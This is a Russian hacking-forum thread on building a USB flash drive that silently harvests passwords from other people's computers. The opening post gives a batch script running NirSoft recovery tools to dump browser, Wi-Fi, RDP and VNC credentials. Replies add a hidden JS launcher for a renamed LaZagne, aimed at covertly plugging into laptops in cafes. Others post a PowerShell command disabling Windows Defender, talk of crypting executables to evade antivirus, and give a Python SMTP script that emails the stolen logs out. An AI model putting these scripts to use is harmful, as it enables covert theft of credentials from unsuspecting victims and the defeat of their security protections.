Статья Создаем USB stealer паролей (для начинающих)

Приветсвую!
Мой первый пост, так что не судите строго
В этой статье, уважаемый %username%, ты научишься создать свою собственную usb-флешку, для быстрого бэкапа (кражи) паролей с нужной для тебя рабочей станции.

​

Что же нам для этого надо:
1) usb флюшка
2) продукты от Nirsoft'a, которые можно скачать бесплатно с офф. сайта

Ссылка скрыта от гостей

:

• MessenPass
• Mail PassView
• Protected Storage PassView
• Dialupass
• BulletsPassView
• Network Password Recovery
• SniffPass Password Sniffer
• RouterPassView
• PstPassword
• WebBrowserPassView
• WirelessKeyView
• Remote Desktop PassView
• VNCPassView

После того, как вы скачали вышеуказанный софт, его следует перенести на сам флеш-диск.

3) Открываем блокнот, после чего вставляем в него следующее содержимое:

start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt<br>start pspv.exe /stext pspv.txt
start Dialupass.exe /stext Dialupass.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start netpass.exe /stext netpass.txt
start sniffpass.exe /stext sniffpass.txt
start RouterPassView.exe /stext RouterPassView.txt
start PstPassword.exe /stext PstPassword.txt
start WebBrowserPassView.exe /stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start rdpv.exe /stext rdpv.txt
start VNCPassView.exe /stext VNCPassView.txt

после сохранив его как backup.bat, копируем на флешку.

4) Вуаля, вы восхитительны! Можете вставить флешку в любой ПК, запустить backup.bat и у вас создадутся *.txt файлы с паролями браузеров, wifi, vnc и т.д.

От автора:
1) в чем плюс данного метода? вышеуказанный софт, вы качаете с офф.сайта (собственно уже можно быть уверенным, что к ним не привязаны другие вирусы от автора статьи)
2) также можно воспользоваться данной тулзой: The LaZagne Project , если будет интересно запилю howto на русском языке.

 

[Sunnych]

попробуй прячем вредоносный файл (криптовка ехе)

Спасибо очень интересно, в ответ мой реверанс как все таки должен работать стил с флешки, когда у Вас зазор в секунды воткнуть в кафе флешку в ноут и быстро запустить но не палиться, практическое применение:
Файл: "help.js" - название этого файла может быть любым

var activex = new ActiveXObject("WScript.Shell");
activex.Run("help.bat", 0, true);

Файл: "help.bat" - название этого файла должно быть такое как написано в файле *.js выше, внутри кода этого bat файла переименованный LaZagne.exe в help.exe

@help.exe all >> "%date%-%time::=-%.txt"

Само собой все должно быть или в корне флешки или в одной папке, отрабатывает даже на медленных ноутах за 3 - 5 секунд, всплывающих окон нет ;-) пользуйтесь

 

[Tihon49]

SniffPass.exe - там нужно нажимать на кнопку старт. только руками?
LaZagne.exe - это огонь!!!!
Мож каким ламерам типа меня пригодится:
как я выключаю Windows Defender батником (открывать от имени администратора):
создаем батник с кодом внутри

@powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true

после этого смотрим комментарий #21

 

[Sunnych]

Приветсвую!
Мой первый пост, так что не судите строго
​

​

Ещё вспомнил был такой проект tresacton/PasswordStealer который каждый под себя руками допиливал, было актуально пока работал авторан ;-) но смысл тот который и хотел донести автор первого поста ;-)
а если все это скрестить с тем что я ранее написал и воспользоваться советом который мне дал тут же в сообщениях 5h3ll по поводу "прячем вредоносный файл (криптовка ехе) " то получаем продукт ;-)

Ссылка скрыта от гостей

И к чему это?

это еще один взгляд и дата February 5, 2018 и там есть ссылка

Ссылка скрыта от гостей

просто чем больше разных вариантов видеть тем больше вариантов додумать что то новое

 

[Changer431]

Нефига в текстовой файл не записывается он) Тупа открылись все проги и че? А авто не сохраняет, доработать надо батник

тоже проверил толкьо что на ос 7 и 2008. сохраняет тхт только BulletsPassView. остальные просто открывает прогу.

 

[dramanbase]

Идея интересная была.Но теперь даже примитивный защитник виндовс блокирует авторан. И пишет еще что была попытка кражи паролей.Так что жаль уже не работает

 

[MLNK]

Ссылка скрыта от гостей

И к чему это?

это еще один взгляд и дата February 5, 2018 и там есть ссылка

Ссылка скрыта от гостей

просто чем больше разных вариантов видеть тем больше вариантов додумать что то новое

так там ничего нового, устаревшие методы копипастят и всё

 

[merlin7]

Стрёмный какой то гайд(не в обиду). Это фитчу можно провернуть с одной программой и двумя строчками кода, а не скачивать уйму прог. Да и как высше писали "Nirsoft распознается Windows 10 как вирусные программы ...".

 

[Xulinam]

USBSteaier мне больше понравилась, чем все остальное.) у управление простое)) так же не вин10 не НОД не спалил)

 

[Sunnych]

USBSteaier мне больше понравилась, чем все остальное.) у управление простое)) так же не вин10 не НОД не спалил)

Только что перепроверил, даже при скачивании USBSteaier.zip Windows 10 с ядром 1709 и 1803 на ходу удаляют файлы архива, так же на всякий случай проверил версии софта и на Nirsoft более свежие версии, антивирусом не проверял (нет смысла если на лету антивирус windows лупит все)!

 

[Xulinam]

Только что перепроверил, даже при скачивании USBSteaier.zip Windows 10 с ядром 1709 и 1803 на ходу удаляют файлы архива, так же на всякий случай проверил версии софта и на Nirsoft более свежие версии, антивирусом не проверял (нет смысла если на лету антивирус windows лупит все)!

я скачал с под ллинукс и запилил на флэшку и все прокатило)

 

[wittmann404]

Спасибо очень интересно, в ответ мой реверанс как все таки должен работать стил с флешки, когда у Вас зазор в секунды воткнуть в кафе флешку в ноут и быстро запустить но не палиться, практическое применение:
Файл: "help.js" - название этого файла может быть любым

var activex = new ActiveXObject("WScript.Shell");
activex.Run("help.bat", 0, true);

Файл: "help.bat" - название этого файла должно быть такое как написано в файле *.js выше, внутри кода этого bat файла переименованный LaZagne.exe в help.exe

@help.exe all >> "%date%-%time::=-%.txt"

Само собой все должно быть или в корне флешки или в одной папке, отрабатывает даже на медленных ноутах за 3 - 5 секунд, всплывающих окон нет ;-) пользуйтесь

Можно отдельную статью в форензике запилить

 

[Sunnych]

Можно отдельную статью в форензике запилить

там уже есть про стилус, но раскрытие паролей и все с этим то же будет, только рабочего характера, даже LaZagne нужно заново компилировать дабы антивирусные системы не обнаруживали - но это больше тема данного раздела
Этичный Хакинг (тестирование на проникновение): каталог статей для этого раздела показано Создаем USB stealer паролей (для начинающих) #21 как не засветится при ...

 

[Valkiria]

Те люди. которые утверждают, что нет на самом деле никаких хакеров, по всей видимости правы.
Эта статья скопирована слово-в-слово по меньшей мере

Ссылка скрыта от гостей

.
Лишь однажды какой-то заблокированный юзер подметил, что ничего не получится.

Но не всем же нужны какие-то аж целые СБОРКИ (О, Боги) стилеров и армия ботов.
Иногда нужно одно-разово воткнуть незаметно флэшку в не свой комп и узнать что-то нужное ))

В таких ситуациях, когда нужно приготовить флэшку, кажется что полно статей-инструкций, по которым в течение часа можно собрать хоть что-то рабочее. Но когда доходят руки до практического применения, то оказывается. что все статьи - фейковые.
На весь рунет нет ни одной умной мысли, как на самом деле сделать флэшку - стилер.
Нужно в очередной раз самостоятельно изобретать велосипед.
Это - кошмар !

 

[Er0]

Те люди. которые утверждают, что нет на самом деле никаких хакеров, по всей видимости правы.
Эта статья скопирована слово-в-слово по меньшей мере

Ссылка скрыта от гостей

.
Лишь однажды какой-то заблокированный юзер подметил, что ничего не получится.

Это все априори бред в 2019 ,может в нулевых это и играло свою роль но сейчас тупо не рентабельно . Когда на рынке можно приобрести сборки стиллеров в dll формате ,купить тот-же VNC бот и в ус не дуть . На эксплоите полно вариантов

 

[am29f010b]

Вообще последний пост провокационный.
Особенно позабавило про "час"

 

[TellWeb]

Но не всем же нужны какие-то аж целые СБОРКИ (О, Боги) стилеров и армия ботов.
Иногда нужно одно-разово воткнуть незаметно флэшку в не свой комп и узнать что-то нужное ))

В таких ситуациях, когда нужно приготовить флэшку, кажется что полно статей-инструкций, по которым в течение часа можно собрать хоть что-то рабочее. Но когда доходят руки до практического применения, то оказывается. что все статьи - фейковые.
На весь рунет нет ни одной умной мысли, как на самом деле сделать флэшку - стилер.
Нужно в очередной раз самостоятельно изобретать велосипед.
Это - кошмар !

собири нам велик плз

 

[Somati1981]

Отличная статья спасибо, но у меня уже есть стилер но на могу распаковать на винд 10 защитник крадет распакованное. Устал его отключать.

 

[Omicron122]

интегрировать с атаками типа badusb будет в самый раз. стилер, скачивающий в тихом режиме с некоего хостинга заранее подготовленный sfx архив с утилитами нирсофта, быстренько запускающий батник, который будет содержать еще отправку логов куда-то на мейл (можно добавить консольную мейл отправлялку в архив и команду на ее запуск в батник, как-то так)

А откуда брать конмольную отправлялку?)

 

[Your 2B wify]

А откуда брать конмольную отправлялку?)

Написать)))
Могу подкинуть пример на Python, останется только через cx_Freeze или pyinstaller(баганая чертила) прогнать и получить exe.

from smtplib import SMTP_SSL
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email import Encoders
import os

file="" # file name 
address = "" # your email like pupkin@zalupkin.xyz
password="" # passwod
 
#-b-l-a-c-k- white magic here
# Compose attachment
part = MIMEBase('application', "octet-stream")
part.set_payload(open(file,"rb").read() )
Encoders.encode_base64(part)
part.add_header('Content-Disposition', 'attachment; filename="%s"' % basename)

# Compose message
msg = MIMEMultipart()
msg['From'] = address
msg['To'] = address
msg.attach(part)

# Send mail
smtp = SMTP_SSL()
smtp.connect('smtp.yandex.ru') # change if you DONT use yandex
smtp.login(address, password)
smtp.sendmail(address, address, msg.as_string()) #you send mail to self mail
smtp.quit()

 

[Паша Тихонов]

что сделать чтобы при запуске проги окна не вылезали?